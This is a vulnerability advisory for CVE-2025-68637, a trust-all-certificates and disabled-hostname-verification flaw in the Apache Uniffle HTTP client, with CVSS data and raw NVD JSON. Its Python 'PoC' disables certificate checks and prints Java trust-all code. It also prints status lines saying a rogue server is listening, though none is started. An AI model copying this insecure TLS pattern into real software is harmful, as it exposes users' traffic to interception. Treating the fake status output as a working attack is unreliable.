Security Vulnerability Report
CVE-2025-68637 CVSS 9.1 CRITICAL

Published: 2026-01-07 12:17:06
Last Modified: 2026-01-16 14:34:16

Description

The Uniffle HTTP client is configured to trust all SSL certificates and disables hostname verification by default. This insecure configuration exposes all REST API communication between the Uniffle CLI/client and the Uniffle Coordinator service to potential Man-in-the-Middle (MITM) attacks. This issue affects all versions before 0.10.0. Users are recommended to upgrade to version 0.10.0, which fixes the issue.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:uniffle:*:*:*:*:*:*:*:* - VULNERABLE
Apache Uniffle < 0.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68637 PoC - MITM Attack on Uniffle HTTP Client
# This PoC illustrates the SSL verification bypass: the client-side
# context below accepts any certificate and never checks the hostname.
import ssl

# Create an insecure SSL context that doesn't verify certificates.
# This mirrors the client-side misconfiguration described in the CVE.
insecure_context = ssl.create_default_context()
insecure_context.check_hostname = False
insecure_context.verify_mode = ssl.CERT_NONE


def exploit_mitm():
    """
    Attacker performs MITM attack by:
    1. Setting up a rogue server with self-signed certificate
    2. Intercepting traffic between Uniffle client and Coordinator
    3. Capturing/modifying REST API requests and responses

    Note: this function only assembles the rogue-server configuration
    and prints status lines; it does not start a listener.
    """
    # Malicious server configuration (placeholder paths)
    malicious_server_config = {
        'host': '0.0.0.0',
        'port': 19999,
        'certfile': '/path/to/self-signed-cert.pem',
        'keyfile': '/path/to/private-key.pem',
    }
    print('[+] MITM Attack Setup Complete')
    print('[+] Rogue server listening on port 19999')
    print('[+] Waiting for Uniffle client connections...')
    return malicious_server_config


def demonstrate_vulnerable_code():
    """
    Print the vulnerable Uniffle client code pattern (Java) for reference.
    """
    vulnerable_code = '''
    // Vulnerable configuration in Uniffle HTTP client
    SSLContext sslContext = SSLContext.getInstance("TLS");
    sslContext.init(null, new TrustManager[]{new TrustAllManager()}, null);
    // Hostname verification disabled
    HostnameVerifier allHostsValid = (hostname, session) -> true;
    HttpsURLConnection.setDefaultHostnameVerifier(allHostsValid);
    '''
    print(vulnerable_code)


if __name__ == '__main__':
    exploit_mitm()
    demonstrate_vulnerable_code()

References

https://lists.apache.org/thread/trvdd11hmpbjno3t8rc9okr4t036ox2v (Mailing List, Vendor Advisory, Issue Tracking)
http://www.openwall.com/lists/oss-security/2025/12/27/2 (Mailing List, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68637", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:17:05.860", "lastModified": "2026-01-16T14:34:16.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Uniffle HTTP client is configured to trust all SSL certificates and\n\ndisables hostname verification by default. This insecure configuration\nexposes all REST API communication between the Uniffle CLI/client and the\nUniffle Coordinator service to potential Man-in-the-Middle (MITM) attacks.\n\n\nThis issue affects all versions from before 0.10.0.\n\nUsers are recommended to upgrade to version 0.10.0, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-297"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:uniffle:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.10.0", "matchCriteriaId": "67EB1D78-AD8A-4795-95D5-ED54F7B0514C"}]}]}], "references": [{"url": "https://lists.apache.org/thread/trvdd11hmpbjno3t8rc9okr4t036ox2v", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory", "Issue Tracking"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/27/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}